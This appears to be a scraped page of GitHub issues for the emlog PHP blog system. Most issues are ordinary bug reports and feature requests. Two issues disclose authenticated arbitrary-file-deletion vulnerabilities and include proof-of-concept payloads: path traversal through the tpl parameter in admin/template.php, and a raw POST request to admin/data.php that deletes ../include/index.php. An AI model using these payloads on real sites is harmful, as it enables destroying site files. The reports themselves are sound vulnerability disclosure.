emlog / emlog Goto Github PK
View Code? Open in Web Editor NEW轻量级开源博客及建站系统
License: GNU General Public License v3.0
轻量级开源博客及建站系统
License: GNU General Public License v3.0
管理员密码忘了怎么改?
注册需要邀请码 ->
邀请码需要发布模板 ->
发布模板需要注册 ->
注册需要邀请码 !
我凑,难道我没找对地方?
数据库的链接与版本环境并不多互兼容,请升级兼容
希望将此文件加载判断加入到 init.php 中进行判断处理
function resume_theme($theme){
if( !is_dir( TPLS_PATH . $theme ."/functions.php" ) ){
ob_start();
include( TPLS_PATH . $theme ."/functions.php");
ob_clean();
}
}
resume_theme( Option::get('nonce_templet') );
Hi dear friends!
I am glad to inform you that the multilingual version of Emlog Pro is still alive and developing in sync with the original version.
The Emlog Pro ML repository is hosted at sourceforge: https://sourceforge.net/p/emlog-ml/
FYI: My previous message about Emlog ML was posted here 7 years ago:
#27
I want to add my own ignored files into the .gitignore files, but I can not do that because of this file is included into the git index :(
It would be nice to remove .gitignore from the repository. but add a .gitignore.sample file.
This solution would allow each developer to add their own files to the ignore list.
在标签SQL处理过程中,增加标签SQL进行了编码转换,在输出时并未进行相关处理,请优化。
错误推送步骤:在标签栏目中增加“”/\等字符串即出现
虚拟主机默认禁止了configure.php的访问,导致无法打开。
更换文件名字后可以打开,但是无法提交,显示权限不足,token error。
数据库前缀带大写 导入导出有问题
At the moment jQuery is placed twice in the emlog:
It would be nice to store jQuery only once, i.e. in the common assets folder:
BLOG_URL/assets/jquery.min.3.5.1.js
点击安装最后一步显示,服务器空间PHP不支持MySql数据库
写个小功能,能在数据表emlog_blog中自定义添加字段,可以在后台的系统分页中开辟一个“开发者”的小分页放进去
模版、插件下载后会在/tmp目录生成许多诸如
emtemp_nPLfdU
emtemp_Qw00qK
这样的临时文件,对于长时间不重启的服务器来说如果大量emlog安装大量插件会导致占用过多的磁盘空间。需要在代码中加入清理逻辑。
评论表中建议增加一个useragent字段,以便后续开发者使用
vulnerability in admin/template.php line 67:
`if ($action == 'del')
{
LoginAuth::checkToken();
$tplName = isset($_GET['tpl']) ? addslashes($_GET['tpl']) : '';
$nonce_templet = Option::get('nonce_templet');
if ($tplName === $nonce_templet)
{
emMsg('您不能删除正在使用的模板');
}
if (true === emDeleteFile(TPLS_PATH . $tplName)) {
emDirect("./template.php?activate_del=1#tpllib");
} else {
emDirect("./template.php?error_a=1#tpllib");
}
}`
if (true === emDeleteFile(TPLS_PATH . $tplName))
tracking emDeleteFile function:
function emDeleteFile($file) { if (empty($file)) return false; if (@is_file($file)) return @unlink($file); $ret = true; if ($handle = @opendir($file)) { while ($filename = @readdir($handle)) { if ($filename == '.' || $filename == '..') continue; if (!emDeleteFile($file . '/' . $filename)) $ret = false; } } else { $ret = false; } @closedir($handle); if (file_exists($file) && !rmdir($file)) { $ret = false; } return $ret; }
Unrestricted character “../”
Login management background and view /admin/template.php?action=del&tpl=../../index.php&token=U login token!
POC:
/emlog/admin/template.php?action=del&tpl=../../index.php&token={U login token}
/include/lib/function.base.php 文件里的 getMonthDayNum($month, $year) 函数接收两个参数。
在之后的参数使用过程中 [array_key_exists],直接假定了传进来的参数是 Int 类型。
但是实际上传进来的参数是 String 类型,并且月份是有前导0的。
比如说在日志存档功能查询 201101 ,实际上传进来的参数是 "01" 和 "2011"
而直接用 "01" 去做 array_key_exists 匹配,就无法匹配上。
导致直接返回了后续判定的 2 月份的 28天,从而导致日志归档功能有些日志无法显示。
同时闰年的算法也有问题。
需要先判定年份是否能被100整除。
能被100整除的年份,需要同时能被400整除才算是闰年。
评论部分
发现一些存在全表扫描的低性能语句,评论较多(1W+)和多站点高并发时会导致mysql的io压力升高
SELECT gid FROM emlog_comment where hide='y';
SELECT cid FROM emlog_comment WHERE hide='n';
SELECT * FROM emlog_comment as a where 1=1 and a.gid=2 and a.hide='n' ORDER BY a.date ASC;
修改配置文件添加新的允许上传文件后缀, 后台批量上传依然不行。
Hi friends!
Many years I'm watching the Emlog with a great interest.
I offer to convert Emlog from Single-lingual to Multi-lingual.
I think such version will be quite interesting for many users.
For example:
My English demo version: http://codersclub.org/emlog/
There is no problem to add any other language.
I.e. at my localhost I have Chinese + English + Russian language packs installed together.
My current code repository: https://bitbucket.org/vot/emlog
Let's work together!
安装后直接使用,会出现如上错误。
解决办法:
/src/include/lib/cache.php
的195行
194 while($row = $this->db->fetch_array($query)) {
195 $$row['option_name'] = $row['option_value'];
196 }
197 $query = $this->db->query("SELECT * FROM " . DB_PREFIX . "comment WHERE hide='n' ORDER BY date DESC LIMIT 0, $index_comnum");
中的195行,改为: ${$row['option_name']} = $row['option_value'];
系统环境:
~ ᐅ php -v
PHP 7.0.2 (cli) (built: Jan 7 2016 10:40:26) ( NTS )
Copyright (c) 1997-2015 The PHP Group
Zend Engine v3.0.0, Copyright (c) 1998-2015 Zend Technologies
~ ᐅ uname -a
Darwin Snail 15.3.0 Darwin Kernel Version 15.3.0: Thu Dec 10 18:40:58 PST 2015; root:xnu-3248.30.4~1/RELEASE_X86_64 x86_64
安装完报过一次错,之后发完文章都会报错、发表评论、删除评论都会跳转到报错页面,模板的最新评论、最新文章、及最新微语模块也会显示同样的报错,另外微语发出之后是空白的没有任何字,找了很久发现不是模块的问题。
SQL语句执行错误:SELECT * FROM emlogg_comment WHERE hide='n' ORDER BY date DESC LIMIT 0,
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
1.EMLOG的登录失败提示功能,一个合格的登录系统不应该暴露帐户是否存在,容易被人暴力破解。账号或密码错误应该一致提示:账号或密码错误。
2.后台登录验证码可爆破,相当于摆设可被hack恶心爆破
修复方法在/admin/globals.php 第33行else后新增 unset($_SESSION['code']);
每判断一次,如果抛出错误就销毁$_SESSION['code'],只要出现密码错误一次后,就自动销毁了$_SESSION['code'],
配置如下
PHP版本:5.6.40
MySQL版本:5.7.32-log
服务器环境:nginx/1.18.0
打开设置后 普通作者发布的文章必须经过审核才可以发布。
这个库已经七个多月没有更新了,是不是已经没人维护了?
您好,没注册不可以发文章吗
Programming style recommendations PSR-1 recommends using the short tag "<?=" instead of the long expression "<?php echo".
I suggest using "<?=" throughout all templates. This will make your code cleaner and prettier.
wiki文档现在还是看不了,是不是现在都不支持主题定制了?
It woild be nice to add an icon to every sidebar menu item.
See the screenshot below:
My solution is here:
https://bitbucket.org/vot/emlog/commits/6cbc17521d152b18f9c9628cb16c4b6f425ee362
You can remove Chinese language from Google Map.
Now the language is set automatically ("en" for me).
My commit:
https://bitbucket.org/vot/emlog/commits/6d3b22029427506de4ea7fd38179d81ddc337ed3
Unfortunately the plugin "/src/include/lib/js/jquery/plugin-interface.js" is obsolete.
It is not working with the modern jQuery versions.
This plugin is used for reorder the widget positions in the sidebar.
I offer to replace plugin-interface.js with the HTML5 jquery.sortable plugin.
My ready to use solution is here:
https://bitbucket.org/vot/emlog/commits/d5544a308dbf05aa52ea635c7d6d63c2699e08fb
希望全局添加一个检测最新工具,然后将相关得文件项目以 github 项目推送
作者是不是换人了?原作者把emlog卖掉了吧?
http://bbs.emlog.net/thread-33370-1-1.html
已经有用户创建大量的分类遇到问题
目前分类字段都用的是有符号的tinyint类型,默认值为-1,如果用户的分类个数超过127个那么就无法继续添加了,为一个 -1 浪费tinyint的127值有点没有必要,可以考虑将无分类定位0而不是-1,将分类字段修改为无符号的tinyint可以支持255的分类个数,应该是足够用了。
手机版本查看父类不显示子类的BUG
vulnerability in admin/data.php line 139:
if ($action == 'dell_all_bak') {
if (!isset($_POST['bak'])) {
emDirect('./data.php?error_a=1');
} else{
foreach ($_POST['bak'] as $val) {
unlink($val);
}
emDirect('./data.php?active_del=1');
}
}
post any filepath as "bak" , will delete it.
Login management background and view /admin/data.php?action=dell_all_bak
POST bak=anyfile,like ../index.php something.
POC:
Host: 127.0.0.1
Content-Length: 28
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://127.0.0.1/emlog/admin/data.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: page_iframe_url=http://127.0.0.1/metinfo/index.php?lang=cn&pageset=1; pgv_pvi=3037471744; PHPSESSID=u91v66ktst9vrva3ueb6333kt2; EM_AUTHCOOKIE_WtaQDRqaTBRof8EENT0LY3HNhJzryEPL=admin%7C%7Ce4739a735508976ba1d54ac95a78be3b; EM_TOKENCOOKIE_55cd567609038eefc9aaa8c1c0e141e1=d0025af7e912a4cc8b114e2f6cda6597
Connection: close
bak%5B%5D=../include/index.php
是不是说明emlog以后在也没有了?
bug表现:
删除默认管理员之后侧边栏blogger不显示,所有管理员发布的文章都无法显示作者并有notice错误
分析:
分类页面添加子分类,导航的cache不更新,还会删除导航cache里的子菜单。
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.